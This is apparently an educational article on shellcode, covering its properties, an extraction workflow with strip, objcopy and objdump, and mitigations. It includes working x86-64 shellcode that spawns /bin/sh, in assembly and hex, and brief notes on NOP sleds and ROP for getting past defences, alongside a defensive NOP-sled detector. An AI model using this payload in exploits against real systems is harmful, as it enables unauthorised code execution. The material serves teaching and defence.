Shellcode is a small piece of machine code designed to execute specific tasks, often as part of an exploit to gain control over a program or system. It is called “shellcode” because it originally referred to code that spawns a shell (e.g., /bin/sh) to provide an attacker with command-line access. However, the term has evolved, and now it broadly refers to any standalone, payload-specific machine code.

Characteristics of Shellcode

  1. Compact: Shellcode is designed to be as small as possible to fit into constrained memory areas, such as buffers exploited in a vulnerability.
  2. Self-contained: It typically does not rely on external libraries or functions but may invoke system calls directly.
  3. Position-independent: Shellcode often uses relative addressing to ensure it works regardless of where it is loaded into memory.
  4. Raw machine code: Shellcode is pure machine instructions and does not include any metadata, headers, or higher-level constructs like those in an ELF or PE file.

Shellcode is most commonly used when exploiting vulnerabilities such as buffer overflows and other memory-corruption bugs, where it is the payload that gives the attacker arbitrary code execution. Penetration-testing tools craft and deploy a wide variety of shellcode. On embedded systems and other restricted computing platforms, it is also used to execute specific tasks directly on the hardware.

Tip

Shellcode is typically used to spawn a shell, escalate privileges, or download and execute additional malicious code.

Examples

Linux Shellcode to Spawn a Shell

Here is an example of simple x86-64 shellcode to spawn a /bin/sh shell by invoking the execve syscall directly:

Assembly

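section .text
global _start

_start:
    xor rax, rax                    ; rax = 0
    push rax                        ; Push 8 zero bytes to null-terminate the string
    mov rbx, 0x68732f2f6e69622f     ; "/bin//sh" in little-endian order (extra slash pads to 8 bytes)
    push rbx                        ; Stack now holds "/bin//sh" followed by the terminator
    mov rdi, rsp                    ; rdi (first arg): pointer to "/bin//sh"
    mov rsi, rax                    ; rsi (second arg): argv = NULL
    mov rdx, rax                    ; rdx (third arg): envp = NULL
    mov eax, 59                     ; rax = 59, the execve syscall number on x86-64 Linux
    syscall                         ; Invoke execve("/bin//sh", NULL, NULL)

The corresponding machine code (in hex):

48 31 c0 50 48 bb 2f 62 69 6e 2f 2f 73 68 53 48 89 e7 48 89 c6 48 89 c2 b8 3b 00 00 00 0f 05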
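
Before a hex listing like this can be used in a test harness, it usually has to be converted to raw bytes or to a C-style escaped string. The following is a minimal Python sketch of that conversion. The helper names hex_to_bytes and to_c_literal are illustrative and do not belong to any tool mentioned in this note. The sample input is the first four bytes of the listing, which encode xor rax, rax followed by push rax.

```python
def hex_to_bytes(listing: str) -> bytes:
    """Convert a space-separated hex listing such as '48 31 c0' to raw bytes."""
    return bytes.fromhex(listing.strip())


def to_c_literal(code: bytes) -> str:
    """Format raw bytes as the body of a C-style escaped string."""
    return "".join(f"\\x{b:02x}" for b in code)


if __name__ == "__main__":
    # Sample input: the encodings of `xor rax, rax` and `push rax`.
    sample = hex_to_bytes("48 31 c0 50")
    print(len(sample), "bytes")
    print(to_c_literal(sample))
```

Counting the bytes this way is also a quick check on the "compact" property described earlier, since the length of the byte string is the exact size the payload occupies in memory.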

Example: creating a shellcode from an executable

To create shellcode, you often start with a compiled binary, strip unnecessary metadata, and extract the raw executable instructions. For instance, after compiling a simple program written in low-level Rust, you can use strip to remove debug symbols and other non-essential data from the resulting binary. Next, objcopy converts the stripped binary into a raw binary format: it drops the ELF headers and other metadata and keeps only the contents of the loadable sections. The resulting raw binary can then be disassembled with objdump to analyze its instructions. For example:

strip -s hello_world/target/release/hello_world
objcopy -O binary hello_world/target/release/hello_world shellcode.bin
objdump -D -b binary -mi386 -Mx86-64 -Mintel -z shellcode.bin

The disassembly output uses a three-column format: offsets on the left, machine code (hexadecimal bytes) in the middle, and assembly instructions on the right. Each assembly instruction is decoded from its machine code bytes according to the CPU architecture’s encoding rules. These raw instructions are what make up the shellcode. For details on interpreting disassembly output and the role of flags like -b, -m, and -M, see the Disassembling note.
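
The three-column layout can be made concrete with a small parser. The sketch below assumes each instruction line has the form offset, colon, tab, hex bytes, tab, instruction text, which is how GNU objdump typically prints it. The sample line and the name parse_disasm_line are illustrative and were not taken from the actual output of the commands above.

```python
from typing import NamedTuple, Optional


class DisasmLine(NamedTuple):
    offset: int        # left column: offset of the instruction
    code: bytes        # middle column: encoded instruction bytes
    instruction: str   # right column: assembly text


def parse_disasm_line(line: str) -> Optional[DisasmLine]:
    """Split one objdump-style line into its three columns.

    Returns None for lines that do not match the assumed layout,
    such as headers, blank lines, or byte-only continuation lines.
    """
    parts = line.split("\t")
    if len(parts) < 3 or not parts[0].strip().endswith(":"):
        return None
    try:
        offset = int(parts[0].strip().rstrip(":"), 16)
        code = bytes.fromhex(parts[1].strip())
    except ValueError:
        return None
    # Collapse the padding objdump inserts between mnemonic and operands.
    return DisasmLine(offset, code, " ".join(parts[2].split()))


if __name__ == "__main__":
    # Hypothetical sample line in the assumed tab-separated layout.
    sample = "   0:\t48 31 c0             \txor    rax,rax"
    print(parse_disasm_line(sample))
```

Concatenating the code field of every parsed line, in offset order, should reproduce the raw bytes of the file that was disassembled.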

This process demonstrates the transformation from high-level code to stripped-down machine instructions suitable for use as shellcode, which can then be executed in contexts such as testing exploits or running specific payloads.


Shellcode and Security

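Detection and Prevention: Modern systems employ mitigations such as ASLR (address space layout randomization), DEP (data execution prevention), and stack canaries to detect or block shellcode execution. However, attackers often counter these defenses with techniques like:

  • NOP sleds: Padding the front of the shellcode with NOP instructions so that a jump landing anywhere in the padding slides into the payload, which tolerates an imprecisely known address.
  • Return-Oriented Programming (ROP): Chaining short instruction sequences that already exist in executable memory, each ending in a return, so that no injected code has to run from a non-executable region.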
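
On the defensive side, the NOP-sled idea suggests a simple heuristic: a long run of the single-byte x86 NOP opcode (0x90) in untrusted input is suspicious. The sketch below illustrates only that idea, using hypothetical function names and an arbitrary threshold. Real detectors also have to handle multi-byte NOPs and NOP-equivalent instructions, so this should not be read as how any particular product works.

```python
NOP = 0x90  # single-byte x86 NOP opcode


def longest_nop_run(data: bytes) -> int:
    """Return the length of the longest run of consecutive 0x90 bytes."""
    longest = current = 0
    for byte in data:
        current = current + 1 if byte == NOP else 0
        longest = max(longest, current)
    return longest


def looks_like_nop_sled(data: bytes, threshold: int = 32) -> bool:
    """Flag input whose longest NOP run reaches the (arbitrary) threshold."""
    return longest_nop_run(data) >= threshold


if __name__ == "__main__":
    benign = b"GET /index.html HTTP/1.1\r\n"
    padded = b"A" * 16 + bytes([NOP]) * 64 + b"\xcc"
    print(looks_like_nop_sled(benign), looks_like_nop_sled(padded))
```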